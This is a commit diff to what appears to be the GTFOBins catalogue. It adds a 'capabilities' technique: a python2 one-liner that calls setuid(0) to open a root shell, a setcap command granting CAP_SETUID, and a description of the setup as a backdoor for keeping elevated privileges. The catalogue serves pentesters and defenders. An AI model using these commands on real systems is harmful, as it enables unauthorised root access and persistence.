Drafting capabilities

_data/functions.yml

@@ -62,6 +62,13 @@ load-library:
     It loads shared libraries that may be used to run code in the binary
     execution context.
 
+capabilities-enabled:
+  label: Capabilities
+  description: |
+    It can manipulate its process UID and in Linux systems it can be set with the
+    `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges.
+    This also works if the binary is invoked by another binary with the capability set.
+
 suid-enabled:
   label: SUID
   description: |

_gtfobins/python2.md

@@ -30,6 +30,8 @@ functions:
     - code: python2 -c 'open("file_to_read").read()'
   load-library:
     - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+  capabilities-enabled:
+    - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")'
   suid-enabled:
     - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
   sudo-enabled:

_layouts/bin.html

@@ -30,6 +30,10 @@ layout: common
 cp $(which {{ bin_name }}) .
 sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
 {% endif %}
+{%- if function_name == 'capabilities-enabled' %}
+cp $(which {{ bin_name }}) .
+sudo setcap cap_setuid+ep {{ bin_name }}
+{% endif %}
 {{ example.code }}
 {% endcapture %}